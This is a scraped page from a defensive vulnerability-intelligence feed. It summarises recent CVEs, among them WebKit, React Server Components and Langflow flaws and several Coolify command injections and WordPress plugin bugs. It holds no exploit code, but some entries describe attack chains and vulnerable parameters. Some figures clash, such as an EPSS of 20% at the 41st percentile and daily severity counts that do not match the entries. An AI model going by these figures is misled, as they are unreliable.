THREAT ALERT

ACT NOW CVE-2025-43529 8.8 WebKit arbitrary code execution via use-after-free memory corruption affects Safari 26.2, iOS/iPadOS 18.7.3 through 26.2, macOS Tahoe 26.2, tvOS 26.2, visionOS 26.2, and watchOS 26.2, allowing remote attackers to execute arbitrary code by convincing users to visit malicious websites. This vulnerability is confirmed actively exploited (CISA KEV) in extremely sophisticated targeted attacks against specific individuals on iOS versions prior to iOS 26, per Apple's security bulletin. EPSS score of 0.12% (32nd percentile) significantly understates real-world risk given confirmed exploitation. Related vulnerability CVE-2025-14174 was issued for the same exploitation campaign, suggesting a complex attack chain targeting Apple ecosystem users. | ACT NOW CVE-2025-43510 7.8 Apple kernel lock state checking flaw allows a malicious application to cause unexpected changes in memory shared between processes, potentially enabling cross-process data manipulation on iOS, macOS, and other Apple platforms. | ACT NOW CVE-2025-48633 5.5 CVE-2025-48633 is a security vulnerability (CVSS 5.5). Risk factors: actively exploited (KEV-listed). Vendor patch is available. | ACT NOW CVE-2025-48572 7.8 Android contains a missing authentication vulnerability (CVE-2025-48572, CVSS 7.8) in multiple locations that allows background activity launches through a permissions bypass, enabling local privilege escalation without user interaction. KEV-listed, this vulnerability enables malicious apps to perform privileged operations silently in the background, bypassing Android's activity launch restrictions. | ACT NOW CVE-2025-34291 8.8 Langflow versions up to and including 1.6.9 contain a chained vulnerability that enables account takeover and remote code execution. An overly permissive CORS configuration (allow_origins='*' with allow_credentials=True) combined with a refresh token cookie configured as SameSite=None allows a malicious webpage to perform cross-origin requests that include credentials and successfully call the refresh endpoint. An attacker-controlled origin can therefore obtain fresh access_token / refresh_token pairs for a victim session. Obtained tokens permit access to authenticated endpoints - including built-in code-execution functionality - allowing the attacker to execute arbitrary code and achieve full system compromise. | ACT NOW CVE-2025-66644 7.2 Array Networks ArrayOS AG before 9.4.5.9 contains an OS command injection vulnerability (CVE-2025-66644, CVSS 7.2) that has been actively exploited in the wild from August through December 2025. KEV-listed, this vulnerability in the VPN/SSL-VPN appliance enables authenticated attackers to execute arbitrary commands on the network edge device. | ACT NOW CVE-2025-55182 10.0 React Server Components in React 19.x contain a critical pre-authentication remote code execution vulnerability (CVE-2025-55182, CVSS 10.0) through unsafe deserialization of HTTP request payloads. With EPSS 71.1% and KEV listing, this vulnerability affects any application using React Server Components with react-server-dom-webpack, react-server-dom-turbopack, or react-server-dom-parcel — enabling complete server compromise through a single HTTP request. | EMERGENCY CVE-2025-66301 9.6 Grav is a file-based Web platform. Prior to 1.8.0-beta.27, due to improper authorization checks when modifying critical fields on a POST request to /admin/pages/{page_name}, an editor with only permissions to change basic content on the form is now able to change the functioning of the form through modifying the content of the data[_json][header][form] which is the YAML frontmatter which includes the process section which dictates what happens after a user submits the form which include some important actions that could lead to further vulnerabilities. This vulnerability is fixed in 1.8.0-beta.27. | ACT NOW CVE-2025-66294 8.8 Grav is a file-based Web platform. Prior to 1.8.0-beta.27, a Server-Side Template Injection (SSTI) vulnerability exists in Grav that allows authenticated attackers with editor permissions to execute arbitrary commands on the server and, under certain conditions, may also be exploited by unauthenticated attackers. This vulnerability stems from weak regex validation in the cleanDangerousTwig method. This vulnerability is fixed in 1.8.0-beta.27. | ACT NOW CVE-2025-58360 8.2 GeoServer contains an XXE vulnerability in the WMS GetMap operation allowing unauthenticated attackers to read server files and perform SSRF attacks. |

Daily vulnerability intelligence for defenders – fresh CVEs with exploitability signals, patch status, and action-oriented priorities from 17 sources.

CVEs published

Track vulnerabilities that matter to your stack

Personalized alerts, dashboards, and weekly digests – free.

Trending Now

Critical Watch

Attack Technique Trend

Prediction based on ZDI Disclosures & CVE data · 30 days

Analytics

Vendor Today – Quick Filter

Techniques

results

Sort:

Base Score

Vector String

Attack Vector (AV)

Attack Complexity (AC)

Privileges Required (PR)

User Interaction (UI)

Scope (S)

Confidentiality (C)

Integrity (I)

Availability (A)

0 | 3.9| 6.9| 8.9| 10

NONE LOW MEDIUM HIGH CRITICAL

CVSS Filter – CVEs match

No CVEs match the selected criteria

Browse older vulnerabilities in Archive

Live Feed auto-refresh 60s

Vulnerability Intelligence — December 23, 2025

17 CVEs tracked today. 1 Critical, 4 High, 2 Medium, 0 Low.

CVE-2025-66209 CRITICAL CVSS 9.9
A command injection vulnerability in Coolify's Database Backup functionality allows authenticated users with application/service management permissions to execute arbitrary commands as root on managed servers. The vulnerability affects all Coolify versions prior to 4.0.0-beta.451 and has a publicly available proof-of-concept exploit. With a CVSS score of 9.9 and confirmed exploitation code available, this represents a critical risk for organizations using Coolify to manage their infrastructure.

Command Injection RCE Coolify
CVE-2025-66213 HIGH CVSS 8.8
An authenticated command injection vulnerability in Coolify's File Storage Directory Mount Path functionality allows users with application/service management permissions to execute arbitrary commands as root on managed servers. The vulnerability affects all Coolify versions prior to 4.0.0-beta.451 and has a publicly available proof-of-concept exploit, though current exploitation probability remains relatively low at 0.20% according to EPSS data. Attackers can achieve full remote code execution with root privileges on the host system by exploiting unsanitized input in the file_storage_directory_source parameter.

Command Injection RCE Coolify
CVE-2025-66212 HIGH CVSS 8.8
An authenticated command injection vulnerability in Coolify's Dynamic Proxy Configuration Filename handling allows users with application/service management permissions to execute arbitrary commands as root on managed servers. The vulnerability affects all Coolify versions prior to 4.0.0-beta.451, with a publicly available proof-of-concept exploit and moderate exploitation likelihood (EPSS 20%, percentile 41%). Attackers can achieve full remote code execution with root privileges by injecting shell commands through unescaped proxy configuration filenames.

Command Injection RCE Coolify
CVE-2025-66211 HIGH CVSS 8.8
An authenticated command injection vulnerability in Coolify's PostgreSQL initialization script handling allows attackers with application/service management permissions to execute arbitrary commands as root on managed servers. The vulnerability affects all Coolify versions prior to 4.0.0-beta.451 and enables full remote code execution through unsanitized PostgreSQL init script filenames passed to shell commands. A public proof-of-concept exploit is available, and while not currently in CISA KEV, the vulnerability has a moderate EPSS score of 0.41% indicating some exploitation probability.

Command Injection PostgreSQL RCE Privilege Escalation Docker
CVE-2025-66210 HIGH CVSS 8.8
A command injection vulnerability in Coolify's Database Import functionality allows authenticated users with application/service management permissions to execute arbitrary system commands as root on managed servers. The vulnerability stems from unsanitized database names being passed directly to shell commands, enabling full remote code execution. A public proof-of-concept exploit is available, and with an EPSS score of 0.41% (61st percentile), this represents a moderate real-world exploitation risk for organizations using vulnerable Coolify versions.

Command Injection RCE Docker Linux Coolify
CVE-2025-14163 MEDIUM CVSS 4.3
Cross-Site Request Forgery in Premium Addons for Elementor plugin versions up to 4.11.53 allows unauthenticated remote attackers to create arbitrary Elementor templates by exploiting missing nonce validation in the 'insert_inner_template' function. An attacker must trick a site administrator or user with edit_posts capability into clicking a malicious link, but no public exploit code has been identified. The EPSS score of 0.02% indicates this vulnerability has very low exploitation probability in practice despite the CVSS 4.3 rating.

WordPress CSRF Premium Addons For Elementor
CVE-2025-14155 MEDIUM CVSS 5.3
Unauthenticated attackers can access private, draft, and pending template content in Premium Addons for Elementor WordPress plugin (versions up to 4.11.53) due to a missing capability check in the 'get_template_content' function. This authentication bypass allows unauthorized disclosure of sensitive template data without requiring user interaction or special privileges. A vendor patch is available, and the vulnerability carries a moderate CVSS score of 5.3 with low technical impact but confirmed accessibility to restricted resources.

Authentication Bypass WordPress Premium Addons For Elementor
CVE-2025-68561 None
SQL injection in AutomatorWP WordPress plugin through version 5.2.4 allows authenticated attackers to execute arbitrary SQL commands. The vulnerability exists in the plugin's database query handling where user-supplied input is not properly sanitized before being used in SQL statements. While EPSS scoring indicates low exploitation probability (0.04th percentile), the SQL injection vector represents a critical capability if exploited, potentially enabling data exfiltration, modification, or deletion from the affected WordPress database.

WordPress PHP SQLi
CVE-2025-68560 None
Local file inclusion vulnerability in CodexThemes TheGem Theme Elements (for Elementor) WordPress plugin through version 5.10.5.1 allows attackers to read arbitrary files from the server via improper control of filename parameters in PHP include/require statements. The vulnerability carries a low EPSS score of 0.17% (38th percentile), indicating minimal real-world exploitation probability despite being a classic PHP file inclusion flaw affecting an Elementor page builder plugin.

WordPress PHP File Upload
CVE-2025-68559 None
Cross-site scripting (XSS) vulnerability in CodexThemes TheGem Theme Elements (for Elementor) plugin through version 5.10.5.1 allows improper neutralization of input during web page generation. Attackers can inject malicious scripts that execute in the context of other users' browsers, potentially compromising WordPress site visitors and administrators. No active exploitation has been confirmed at time of analysis, though the low EPSS score (0.04%) suggests limited real-world exploitation likelihood despite the vulnerability's presence in a widely-used Elementor theme plugin.

WordPress PHP XSS
CVE-2025-68557 None
Chakra test WordPress plugin version 1.0.1 and earlier fails to properly enforce access control restrictions, allowing unauthenticated or lower-privileged users to bypass authentication mechanisms and access restricted functionality. The vulnerability stems from incorrectly configured security levels that do not validate user permissions before executing sensitive operations, and is tracked with an exceptionally low EPSS score (0.04%) despite the missing authorization flaw, suggesting limited real-world exploitation despite the theoretical risk.

Authentication Bypass
CVE-2025-68556 None
Missing authorization controls in VillaTheme HAPPY helpdesk plugin versions up to 1.0.9 allow unauthenticated attackers to bypass access restrictions and interact with support ticket functionality without proper permission verification. This authentication bypass vulnerability affects WordPress installations using the vulnerable plugin and could permit unauthorized access to sensitive support tickets and helpdesk operations. The issue has been reported by Patchstack security researchers with a low EPSS exploitation probability (0.04%) despite the authorization flaw.

WordPress PHP Authentication Bypass
CVE-2025-68551 None
VPSUForm WordPress plugin versions 3.2.24 and earlier expose sensitive embedded system information to unauthorized users via improper access controls, allowing attackers to retrieve data that should be restricted to administrators or authenticated users. The vulnerability affects a widely-deployed WordPress form plugin and has an EPSS score of 0.05% (low exploitation probability), with no confirmed active exploitation or public exploit code at the time of analysis.

Information Disclosure
CVE-2025-68550 None
Blind SQL injection in VillaTheme WPBulky plugin through version 1.1.13 allows attackers to extract sensitive data from WordPress databases via improper neutralization of SQL command elements. The vulnerability affects the wpbulky-wp-bulk-edit-post-types plugin and is confirmed by security audit firm Patchstack, though no public exploit code or active exploitation has been documented at time of analysis.

WordPress PHP SQLi
CVE-2025-68548 None
Stored cross-site scripting (XSS) in WebCodingPlace Responsive Posts Carousel Pro WordPress plugin versions 15.2 and earlier allows authenticated users to inject malicious scripts that execute in the browsers of other site visitors. The vulnerability resides in improper input sanitization during web page generation, enabling attackers to compromise site integrity and steal sensitive user data. EPSS exploitation probability is notably low (0.04%, 14th percentile), suggesting limited real-world attack incentive despite the stored nature of the flaw.

WordPress PHP XSS
CVE-2025-68546 None
Local file inclusion (LFI) vulnerability in Thembay Nika WordPress theme version 1.2.14 and earlier allows unauthenticated attackers to read arbitrary files from the server via improper control of filename parameters in PHP include/require statements. The vulnerability has a low EPSS score (0.17%, 38th percentile) and no confirmed active exploitation, but successful exploitation could disclose sensitive configuration files, source code, or other protected data.

WordPress PHP Lfi
CVE-2025-68544 None
Local file inclusion (LFI) vulnerability in thembay Diza WordPress theme through version 1.3.15 allows unauthenticated attackers to read arbitrary files from the server filesystem via improper control of filename parameters in PHP include/require statements. The vulnerability affects all versions of Diza up to and including 1.3.15, with no public exploit code identified at time of analysis, though the low EPSS score (0.17%) suggests limited real-world exploitation probability despite the attack vector being remote and unauthenticated.

PHP Lfi WordPress

Today's Vulnerabilities Vulnerabilities